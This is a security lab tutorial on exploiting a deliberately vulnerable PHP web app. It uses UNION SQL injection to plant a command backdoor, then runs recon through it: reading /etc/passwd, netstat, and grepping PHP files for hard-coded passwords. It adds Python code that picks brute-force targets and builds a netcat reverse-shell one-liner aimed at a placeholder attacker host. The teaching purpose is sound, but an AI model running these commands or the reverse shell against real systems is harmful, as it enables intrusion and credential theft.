SQL injection (SQLi) is a technique often used to attack data-driven applications.

The attacker includes fragments of SQL in an input field so that the application passes a newly formed, attacker-controlled SQL statement to the database (for example, one that dumps the database contents back to the attacker). SQL injection is a code injection technique: the flaw is in the application's own code, which assembles the query, not in the database server that runs it.

The vulnerability arises when the application builds a query by concatenating user input into the SQL text: either string-literal escape characters in the input (such as a single quote) are not filtered, or the input is not strongly typed (a numeric field accepts arbitrary text) and so is parsed as part of the statement rather than as data. SQL injection is best known as an attack vector against websites, but any application that assembles SQL from untrusted input is exposed, whatever the database behind it.

What is Netcat?

Netcat is a networking utility for reading from and writing to network connections using TCP or UDP. It is designed to be a dependable "back-end" tool that can be used directly or driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can create almost any kind of connection you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP".

Because of a deliberate vulnerability in the user-info.php code, we will use a UNION SQL injection to write a PHP script that allows any user to execute commands locally on the web server.

We will obtain database credentials.

We will open a netcat session using the execute_command.php backdoor script.

We will obtain the lab's fake credit card information.

Legal Disclaimer

As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."

In addition, this is a teaching website
that does not condone malicious behavior of
any kind.

You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered
malicious and is against the law.

Instead of letting brutessh attempt default usernames, you can now direct a potential attack at the student user.

Exploring /etc/passwd

Instructions:

cat /etc/passwd

Click the Execute Command Button

Notes (FYI):

The /etc/passwd file stores the account information that is required during login. Each line has seven colon-separated fields: username, password (normally an "x", meaning the hash is kept in /etc/shadow; an empty field means no password is set), user ID, group ID, GECOS (comment) field, home directory, and login shell.

Notice that mail, ftp, apache, ssh and mysql all have accounts in /etc/passwd. The service accounts alone tell you which software is installed on the host before you have scanned a single port.
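Reading /etc/passwd by eye is fine for one host; the added example below (not from the original page) parses the seven-field format and picks out what the earlier step needs: accounts with a real login shell to hand to an SSH brute-forcer such as brutessh, and accounts with an empty password field. The sample lines are constructed for this example and are not output from the lab machine.

```python
# Added example: parse /etc/passwd lines and pick out the accounts worth attacking.
# SAMPLE_PASSWD is constructed for this example, not copied from the lab machine.

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
student:x:500:500:Student User:/home/student:/bin/bash
oldadmin::501:501:Legacy admin:/home/oldadmin:/bin/bash
"""

FIELDS = ("username", "password", "uid", "gid", "gecos", "home", "shell")
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}


def parse_passwd(text):
    """Return one dict per well-formed line. Lines without exactly seven
    colon-separated fields are skipped rather than guessed at."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue
        entry = dict(zip(FIELDS, parts))
        entry["uid"] = int(entry["uid"])
        entry["gid"] = int(entry["gid"])
        entries.append(entry)
    return entries


def login_capable(entries):
    """Accounts whose shell allows an interactive login. An 'x' in the password
    field means the hash lives in /etc/shadow; an empty field means no password."""
    return [e for e in entries if e["shell"] not in NOLOGIN_SHELLS]


def brute_force_targets(entries):
    """Usernames worth feeding to an SSH brute-forcer instead of a default list:
    non-root accounts that have a login shell."""
    return sorted(e["username"] for e in login_capable(entries) if e["uid"] != 0)


def passwordless(entries):
    """Accounts with an empty password field."""
    return [e["username"] for e in entries if e["password"] == ""]


if __name__ == "__main__":
    found = parse_passwd(SAMPLE_PASSWD)
    print("brute-force targets:", brute_force_targets(found))
    print("no password set:", passwordless(found))
```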

Network Reconnaissance

Instructions:

netstat -nao | grep "0.0.0.0:"

Click the Execute Command Button

Notes (FYI):

Only sockets bound to 0.0.0.0 (every interface) match this grep, so the list is what the host exposes to the network:

3306 - MySQL

22 - SSH

25 - SMTP (Mail)

631 - Internet Printing Protocol (IPP, used by CUPS)

A service bound only to 127.0.0.1 will not appear in this output. Drop the grep (or run netstat -ntul to list only listening TCP and UDP sockets) to see those as well.

Section 11: Using the Backdoor for Database Reconnaissance

Database Reconnaissance

Instructions:

find * -name "*.php" | xargs grep -i "password" | grep "="

Click the Execute Command Button

Notes (FYI):

Find every file ending in .php that contains the string "password" (case-insensitive, because of -i) on a line that also contains "=". Lines matching both are where hard-coded credentials, such as a password assignment in a database connection class, usually sit.

Display PHP Script File

Instructions:

cat classes/MySQLHandler.php | grep -v "<?php"

Click the Execute Command Button

Notes (FYI):

The backdoor returns the command output inside an HTML page. A browser parses "<?php" as the opening of a tag rather than as text, so the script body is hidden instead of rendered. Filtering out the line that carries the opening tag (or viewing the page source) lets the rest of the script appear as plain text.

Create a FIFO (named pipe). A FIFO special file (a named pipe) is similar to a pipe, except that it is accessed as part of the file system. It can be opened by multiple processes for reading or writing. When processes are exchanging data via the FIFO, the kernel passes all data internally without writing it to the file system. Thus, the FIFO special file has no contents on the file system; the file system entry merely serves as a reference point so that processes can access the pipe using a name in the file system.

Pipes allow separate processes to
communicate without having been designed explicitly to work
together.
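The FIFO is what lets a single netcat connection both feed commands to a shell and carry the shell's output back, which is the netcat session this lab opens through the execute_command.php backdoor. The added example below (not from the original page) builds that one-liner and then reproduces its plumbing locally with the network leg replaced by a writer thread, so it runs offline. ATTACKER_HOST and ATTACKER_PORT are placeholders, not addresses from the lab.

```python
import os
import subprocess
import tempfile
import threading

# Added example (not from the original page): the named-pipe plumbing behind a
# netcat reverse shell, with netcat replaced by a local writer so it runs offline.
# ATTACKER_HOST and ATTACKER_PORT are placeholders, not values from the lab.

ATTACKER_HOST = "192.0.2.10"
ATTACKER_PORT = 4444


def reverse_shell_command(host=ATTACKER_HOST, port=ATTACKER_PORT, fifo="/tmp/f"):
    """The classic one-liner: nc writes the attacker's input into the FIFO, sh reads
    its commands from the FIFO, and sh's output (stderr merged in) is piped back into
    nc. The FIFO closes the loop, since nc alone cannot both feed and read the shell."""
    return ("rm -f {f}; mkfifo {f}; cat {f} | /bin/sh -i 2>&1 | nc {h} {p} > {f}"
            .format(f=fifo, h=host, p=port))


def run_through_fifo(commands):
    """Local stand-in for the loop above. A writer thread plays the part of netcat
    delivering attacker input; sh reads that input from the FIFO; sh's output is
    collected and returned. Opening a FIFO blocks until the other end is open too,
    which is why the writer must run in its own thread."""
    workdir = tempfile.mkdtemp()
    fifo = os.path.join(workdir, "f")
    os.mkfifo(fifo)

    def writer():
        with open(fifo, "w") as w:   # blocks until sh's read end is open
            w.write(commands)

    t = threading.Thread(target=writer)
    t.start()
    with open(fifo, "r") as r:       # blocks until the writer's end is open
        proc = subprocess.run(["/bin/sh"], stdin=r, stdout=subprocess.PIPE,
                              stderr=subprocess.STDOUT, text=True)
    t.join()
    os.unlink(fifo)
    os.rmdir(workdir)
    return proc.stdout


if __name__ == "__main__":
    print(reverse_shell_command())
    print(run_through_fifo("echo hello-from-fifo\nid\n"), end="")
```

The detail that matters operationally is the blocking open: whichever side opens the FIFO first waits for the other, so in the real one-liner nothing moves until netcat has connected back to the listener and sh has the read end open.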